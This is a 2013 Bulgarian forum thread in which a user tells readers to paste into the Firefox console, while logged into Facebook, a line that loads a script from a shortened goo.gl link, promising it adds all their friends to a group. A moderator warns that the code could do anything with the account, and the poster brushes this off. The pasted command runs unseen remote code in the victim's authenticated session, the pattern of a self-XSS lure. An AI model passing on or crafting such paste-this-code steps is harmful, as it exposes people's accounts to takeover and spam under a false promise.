- Как да добавим всичките си приятели от фейсбук в дадена груп
WT форуми -> Javascript/DHTML - Готови кодове -> Как да добавим всичките си приятели от фейсбук в дадена груп
Създайте нова тема Напишете отговор 
Автор Съобщение
bishkot
Нов
Нов

Регистриран на: 10/02/2007 12:06 am

Support: 0
Bonus: 0
Мнения: 25
Мнение 20/01/2013 10:16 pm     Как да добавим всичките си приятели от фейсбук в дадена груп Отговорете с цитат


За тези които имат желание да добавт всичките си приетели във фейсбук групата си, или в коя да е друга група, методът е следния :

За тези които ползват Mozilla Firefox

1.Влезте в фейсбук акаунта си и отидете на желаната от вас група.
2.Натиснете комбинирано Cntrl+Shift+K , с което в браузъра трябва да се появи следното:

Как да добавим всичките си приятели

3. Копирайте следния код: (copy,cntr+c)
document.body.appendChild(document.createElement('script')).src='http://goo.gl/Kw7bU';

4.Поставете го (paste,cntr+v) в javascript-цонзолата (снимката по горе), в най долния ред, където може да се пише

5. Enter

Хоп....виждаме как всичките ни приятели се добавят в групата.

Дано да е от полза на някого.
Върнете се в началото
Вижте профила на потребителя Изпратете лично съобщение Посетете сайта на потребителя
GOTI
Турист
Турист

Регистриран на: 01/08/2007 11:58 pm

Support: 2
Bonus: 4
Мнения: 369
Мнение 21/01/2013 9:11 pm      Отговорете с цитат


Нещо не ми стана ясно ....

Там в конзолата до колкото видях не може да се пише .... Surprised
Върнете се в началото
Вижте профила на потребителя Изпратете лично съобщение Изпрати мейла Посетете сайта на потребителя
StormBreaker
Support
Support

Регистриран на: 05/03/2007 10:08 pm

Support: 344
Bonus: 1965
Мнения: 5210
Мнение 21/01/2013 9:54 pm      Отговорете с цитат


А нали знаете, че в тоя код може да има всичко и реално му давате достъп до facebook, логнати в акаунта си?
Върнете се в началото
Вижте профила на потребителя Изпратете лично съобщение
bishkot
Нов
Нов

Регистриран на: 10/02/2007 12:06 am

Support: 0
Bonus: 0
Мнения: 25
Мнение 29/01/2013 12:13 am      Отговорете с цитат


Глупости....как така моце да има всичко и .... както и да е.

по въпроса в конзолата се пише най долу има един ред за писане.... и аз в началото така си помислих Smile
Върнете се в началото
Вижте профила на потребителя Изпратете лично съобщение Посетете сайта на потребителя
Покажи мнения от преди:    
Създайте нова тема   Напишете отговор    web-tourist.net Форуми -> Javascript/DHTML - Готови кодове Часовете са според зоната GMT + 2 Часа
Страница 1 от 1


 
Идете на:  
Не Можете да пускате нови теми
Не Можете да отговаряте на темите
Не Можете да променяте съобщенията си
Не Можете да изтривате съобщенията си
Не Можете да гласувате в анкети